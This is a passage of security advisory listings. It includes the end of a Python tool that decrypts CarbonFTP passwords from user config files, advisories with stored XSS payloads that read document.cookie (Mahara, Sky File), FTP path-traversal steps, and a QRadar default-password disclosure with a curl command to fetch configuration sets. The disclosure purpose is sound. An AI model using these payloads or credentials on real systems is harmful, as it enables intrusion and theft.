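        print("[!] Supply a victims username -u or single encrypted password -p, not both.")
        exit()

    print("[+] Neowise CarbonFTP v1.4")
    time.sleep(0.1)
    print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
    time.sleep(0.1)
    print("[+] Version 2 Exploit fixed for Python 3 compatibility")
    time.sleep(0.1)
    print("[+] Discovered and cracked by hyp3rlinx")
    time.sleep(0.1)
    print("[+] ApparitionSec\n")
    time.sleep(1)

    # Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
    if args.user:
        project_dir = "C:/Users/" + args.user + "/AppData/Roaming/Neowise/CarbonFTPProjects/"
        for name in os.listdir(project_dir):
            # Get encrypted password(s) from the conf file.
            with open(project_dir + name, "r") as conf:
                passwd_enc = carbonftp_conf(conf)
            # Break up into 5 byte chunks as processed by the proprietary decryption routine.
            result_lst = chunk_passwd(passwd_enc)
            # Decrypt the chunks and reassemble the cleartext password.
            cracked_passwd = decryptor(result_lst)
            # Print cracked password or candidates.
            display_cracked_passwd(sz, cracked_passwd)
            time.sleep(0.3)
            passwd_str = ""

    # Crack a single password -p flag.
    if args.encrypted_password:
        result = chunk_passwd([args.encrypted_password])
        cracked_passwd = decryptor(result)
        # Print cracked password or candidates.
        display_cracked_passwd(sz, cracked_passwd)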


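if __name__ == "__main__":
    # With no arguments the published version printed the help of a
    # *bare* ArgumentParser (only -h), hiding -u/-p. Routing the empty
    # invocation through argparse's own -h shows the real options and
    # exits, like before.
    if len(sys.argv) == 1:
        sys.argv.append("-h")
    main(parse_args())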

haproxy hpack-tbl.c Out-Of-Bounds Write


The haproxy hpack implementation in hpack-tbl.c handles 0-length HTTP headers incorrectly. This can lead to a fully controlled relative out-of-bounds write when processing a malicious HTTP2 request (or response).


MD5 | ec4200ed138e11159b83e1a1d18ff6d3



Mahara 19.10.2 Cross Site Scripting


Mahara version 19.10.2 suffers from a persistent cross site scripting vulnerability.


MD5 | 2ceb51c35c29fa3430da64dc10fe32bc

Document Title:
===============
Mahara v19.10.2 CMS - Persistent Cross Site Scripting Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2217


Release Date:
=============
2020-04-21


Vulnerability Laboratory ID (VL-ID):
====================================
2217


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
A fully featured electronic portfolio, weblog, resume builder and social
networking system, connecting users and creating
online communities. Mahara is designed to provide users with the tools
to create a personal and professional learning
and development environment.

(Copy of the Homepage: https://launchpad.net/mahara & https://mahara.org/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a persistent
cross site scripting vulnerability in the Mahara v19.10.2 CMS web application.


Affected Product(s):
====================
Catalyst IT Ltd.
Product: Mahara v19.10.2 - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A persistent input-validation web vulnerability has been discovered in
the official Mahara v19.10.2 CMS web application. It allows remote
attackers to inject their own script code, which the application stores
and later renders in the browsers of other users who view the affected
pages.

The persistent vulnerability is located in the `nombre` (name) and
`descripción` (description) fields of the `Ficheros` (Files) module,
served by `groupfiles.php`; in the request log below these fields travel
as the `files_filebrowser_edit_title` and
`files_filebrowser_edit_description` POST parameters.
Remote attackers with low privileges (a regular group member who can
create folders) can store malicious script code as file and folder names
and descriptions. The injected code can be used to attack the frontend or
backend of the web application. The injection request is a POST carrying
the session's `sesskey` token, so it has to be sent from the attacker's
own authenticated session rather than via CSRF; the payload is stored on
the application side. The stored listings are later rendered for
higher-privileged users who review them, and can be shared.

Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Ficheros (Files Manager)

Vulnerable Input(s):
[+] Crear Carpeta

Vulnerable File(s):
[+] groupfiles.php


Vulnerable Parameter(s):
[+] nombre
[+] descripción

Affected Module(s):
[+] Página principal


Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce ...
1. Open the web-application and login as regular user
2. Move inside the mygroup management
3. Open the ficheros tab on top
4. Inject test payload into the crear carpeta (Nombre & Descripción)
input field for the página principal to output
Note: The execution point occurs on edit, list and delete interaction
5. The created path listings are available for higher privileged user
account that review (Backend)
6. Successful reproduction of the persistent cross site scripting vulnerability!


PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal)
<tr id="file:7191" class="file-item folder no-hover ui-droppable">
<td class="icon-cell">
<div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191"
tabindex="0">
<span class="sr-only">Seleccionar y arrastrar para mover >"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
<span class="icon-folder-open icon icon-lg " role="presentation"
aria-hidden="true"></span>
</div></td>
<td class="filename">
<a
href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27"

id="changefolder:7191" class="inner-link changefolder">
<span class="sr-only">Carpeta:</span>
<span class="display-title ">>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
</a></td>
<td class="filedescription d-none d-md-table-cell">
>"<iframe></iframe> >"<iframe></iframe></td>
<td class="filesize"></td>
<td class="filedate">20/04/2020</td>
<!-- Ensure space for 3 buttons (in the case of a really long single
line string in a user input field -->
<td class="text-right control-buttons ">
<div class="btn-group">
... ...
<button name="files_filebrowser_edit[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-pencil-alt icon-lg" role="presentation"
aria-hidden="true"></span>
<span class="sr-only">Edit folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span></button>
<button name="files_filebrowser_delete[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-trash-alt text-danger icon-lg"
role="presentation" aria-hidden="true"></span>
<span class="sr-only">Delete folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span>
</button></div></td>


--- PoC Session Logs [POST] --- (Mygroup Ficheros)
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------98107146915324237501974151621
Content-Length: 4879
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0&
files_filebrowser_edit_title=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on&
files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=&
files_filebrowser_edit_licensor=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on&
files_filebrowser_update[7191]=Guardar
cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2-
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
-
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------126319663526561351602937008964
Content-Length: 3721
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=&
files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=&
sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2


Reference(s):
https://mahara_cms.localhost:8080/artefact/
https://mahara_cms.localhost:8080/artefact/file/
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php


Security Risk:
==============
The security risk of the persistent cross site scripting web
vulnerability in the web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Sky File 2.1.0 Cross Site Scripting / Directory Traversal


Sky File version 2.1.0 for iOS suffers from cross site scripting and directory traversal vulnerabilities.


MD5 | 68257141fc51e78cb831d3a1949e1aaf

Document Title:
===============
Sky File v2.1.0 iOS - Multiple Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2207


Release Date:
=============
2020-04-21


Vulnerability Laboratory ID (VL-ID):
====================================
2207


Common Vulnerability Scoring System:
====================================
7.2


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Sky File Transfer mainly to solve the problem of mobile device file
management and file transfer, through
our application can help you quickly transfer files to mobile devices,
so that your mobile device as U disk
as used, carry, at any time transmission. Our folder management similar
to the PC computer file mode of
operation, so you manage the file on the mobile device will be as
convenient as the PC, it is not only
suitable for personal life, but also very suitable for office use, it
will bring you more High efficiency.

(Copy of the Homepage:
https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Sky File v2.1.0 mobile ios wifi
web-application.


Affected Product(s):
====================
Jin Chen
Product: Sky File v2.1.0 - (iOS) Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1
Multiple persistent cross site scripting vulnerabilities have been
discovered in the official Sky File v2.1.0 mobile ios web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.

The cross site scripting vulnerability is located in the 'createFolder' module.
Remote attackers with access to the ui via wifi are able
to inject own malicious persistent script code to compromise the
web-application or user credentials. The request method to
inject is POST and the attack vector is located on the application-side.

Successful exploitation of the vulnerability results in session hijacking,
persistent phishing, persistent external redirects and
application-side manipulation of the web context of the affected and
connected device module.


1.2
A directory traversal web vulnerability has been discovered in the
official Sky File v2.1.0 mobile ios web-application.
The web vulnerability allows an attacker to change the path or directory
without authorization and thereby access sensitive application data.

The directory / path web vulnerability is located in the local ftp server
configuration and path validation with the insecure
access permissions. Normally the anonymous user account is only able to
move inside the main app folder but not above to the
web-server and root application files. Because of this issue, remote
attackers are able to connect with anonymous user account
credentials to the wifi ftp server. After that the attacker can use a
misconfiguration in the ftp server of the app path to
transmit `/null//` path commands after CWD and CDUP navigation via an ftp
client. This allows the attacker to gain
unauthorized access to the main root application path.

Successful exploitation of the directory traversal vulnerability results
in unauthorized file system access and information disclosure.


Proof of Concept (PoC):
=======================
1.1
The persistent script code inject vulnerability can be exploited by
remote attackers with wifi network access with low user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.


PoC: Payload
%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:10000/create
Mime Type[application/json]
Request Header:
Host[localhost:10000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:10000/]
Content-Length[140]
Connection[keep-alive]
POST-Daten:

path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E]
Response Header:
Cache-Control[no-cache]
Content-Length[2]
Content-Type[application/json]
Connection[Close]
Server[GCDWebUploader]
-
Status: 200[OK]
GET
http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E
Mime Type[application/json]
Request Header:
Host[localhost:10000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:10000/]
Connection[keep-alive]
Response Header:
Cache-Control[no-cache]
Content-Length[2]
Content-Type[application/json]
Connection[Close]
Server[GCDWebUploader]
-
Status: 200[OK]
GET http://localhost:10000/evil.source
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:10000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:10000/]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[GCDWebUploader]
Connection[Close]



1.2
The directory traversal web vulnerability can be exploited by remote
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.


Manual steps to reproduce ...
1. Open the ftp preview the visible folders
2. Jump back to the following path
/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/
3. Include the payload /(null)// and refresh via list command
4. You are now placed in an empty folder without permission to move
5. Add /(null)/../ to the path and refresh the client
6. Path traversal successful to access the main app root path (./) that
is normally not accessible
7. Successful reproduce of the path traversal web vulnerability!


PoC: Payload
/(null)// to /(null)/../


--- PoC Session Logs (FTP) ---
[21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files
[21:52:40] [R] 221 Thank you for using the FTP service on localhost.
[21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds)
[21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001
[21:52:42] [R] Connected to 192.168.2.116
[21:52:42] [R] 220 iosFtp server ready.
[21:52:42] [R] USER anonymous
[21:52:42] [R] 331 Password required for (null)
[21:52:42] [R] PASS (hidden)
[21:52:42] [R] 230 User (null) logged in.
[21:52:42] [R] SYST
[21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912
[21:52:42] [R] FEAT
[21:52:42] [R] 211-Features supported
[21:52:42] [R] UTF8
[21:52:42] [R] 211 End
[21:52:42] [R] OPTS UTF8 ON
[21:52:42] [R] 200 Type set Opts to UTF8.
[21:52:42] [R] PWD
[21:52:42] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
is the current directory.
[21:52:42] [R] CWD /(null)/
[21:52:42] [R] 550 CWD failed.
[21:52:42] [R] PWD
[21:52:42] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
is the current directory.
[21:52:42] [R] PASV
[21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252)
[21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236
[21:52:42] [R] LIST -al
[21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:42] [R] 226 Transfer complete.
[21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s)
[21:52:43] [R] CDUP
[21:52:43] [R] 250 CDUP command successful.
[21:52:43] [R] PWD
[21:52:43] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder"
is the current directory.
[21:52:43] [R] PASV
[21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51)
[21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323
[21:52:43] [R] LIST -al
[21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:43] [R] 226 Transfer complete.
[21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s)
[21:52:43] [R] CDUP
[21:52:44] [R] 250 CDUP command successful.
[21:52:44] [R] PWD
[21:52:44] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents"
is the current directory.
[21:52:44] [R] PASV
[21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51)
[21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707
[21:52:44] [R] LIST -al
[21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:44] [R] 226 Transfer complete.
[21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s)
[21:53:34] [R] CDUP
[21:53:34] [R] 250 CDUP command successful.
[21:53:34] [R] PWD
[21:53:34] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45"
is the current directory.
[21:53:34] [R] PASV
[21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14)
[21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126
[21:53:34] [R] LIST -al
[21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:34] [R] 226 Transfer complete.
[21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s)
[21:53:35] [R] CDUP
[21:53:35] [R] 250 CDUP command successful.
[21:53:35] [R] PWD
[21:53:35] [R] 257 "(null)" is the current directory.
[21:53:35] [R] PASV
[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14)
[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718
[21:53:35] [R] LIST -al
[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:35] [R] 226 Transfer complete.
[21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s)
[21:53:35] [R] PASV
[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14)
[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622
[21:53:35] [R] LIST -al
[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:35] [R] 226 Transfer complete.
[21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s)
[21:53:36] [R] CDUP
[21:53:36] [R] 550 CDUP command failed.
[21:53:41] [R] CWD /etc
[21:53:41] [R] 250 CWD command successful.
[21:53:41] [R] PWD
[21:53:41] [R] 257 "(null)" is the current directory.
[21:53:48] [R] CDUP
[21:53:48] [R] 550 CDUP command failed.
[21:53:51] [R] CWD /
[21:53:51] [R] 250 CWD command successful.
[21:53:51] [R] PWD
[21:53:51] [R] 257 "/" is the current directory.
[21:53:51] [R] PASV
[21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173)
[21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749
[21:53:51] [R] LIST -al
[21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:51] [R] 226 Transfer complete.
[21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s)
[21:54:02] [R] TYPE I
[21:54:02] [R] 200 Type set to I.

Listing Path ./root
- Applications
- bin
- cores
- developer
- Library
- private
- sbin
- System
- usr
- etc
- var
- tmp


Security Risk:
==============
1.1
The security risk of the persistent input validation web vulnerability
in the createfolder input field is estimated as medium.

1.2
The security risk of the directory traversal web vulnerability in the
mobile ios web application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

QRadar Community Edition 7.3.1.6 Default Credentials


QRadar Community Edition version 7.3.1.6 is deployed with a default password for the ConfigServices account. Using this default password it is possible to download configuration sets containing sensitive information, including (encrypted) credentials and host tokens. With these host tokens it is possible to access other parts of QRadar.


MD5 | 2a17539a1ba52a631c01849db48b744c

------------------------------------------------------------------------
Unauthorized access to QRadar configuration sets via default password
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
QRadar is deployed with a default password for the ConfigServices
account. Using this default password it is possible to download
configuration sets containing sensitive information, including
(encrypted) credentials and host tokens. With these host tokens it is
possible to access other parts of QRadar.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4269 [2]
6189711 [3] - IBM QRadar SIEM contains hard-coded credentials
(CVE-2020-4269)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRadar in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

As a workaround it is possible to remove or disable the configservices
account in the file /opt/qradar/conf/users.conf.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

So-called configuration sets can be downloaded via the web interface.
These sets are normally only accessible for the ConfigServices user. It
was found that QRadar is deployed with a default password for the
ConfigServices account. Using this default password it is possible to
download configuration sets containing sensitive information, including
(encrypted) credentials and host tokens. With these host tokens it is
possible to access other parts of QRadar.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Apache configuration for the QRadar web interface contains a
configuration alias that maps to the
/store/configservices/configurationsets folder. This folder is protected
with the mod_authn_file [12] Apache Module. The only user that is
allowed through is the configservices user.

/etc/httpd/conf.d/configservices_httpd.conf:
Alias /configuration /store/configservices/configurationsets
<Directory /store/configservices/configurationsets>
AuthType Basic
AuthUserFile /opt/qradar/conf/users.conf
AuthName "Identification"
Options Indexes Includes FollowSymLinks MultiViews ExecCGI
AllowOverride All

<Limit GET POST>
require user configservices
</Limit>
</Directory>

The password for this user is set in the file
/opt/qradar/conf/users.conf. The password is protected with the crypt
algorithm; the crypted password is the same for all QRadar
installations.

/opt/qradar/conf/users.conf:
admin:null:ALL:root@localhost:Admin:
configservices:/wEPae8TzCqmM:ALL::ConfigServices:

Cracking the crypted password quickly reveals that the corresponding
password is qradar:

$ python -c 'import crypt; print(crypt.crypt("qradar", "/w"))'
/wEPae8TzCqmM

With the found password it is now possible to download the configuration
set from the web server:

$ curl --insecure --user configservices:qradar
https://<ip>/configuration/globalset_list.xml

It should be noted that the default password of the configservices user
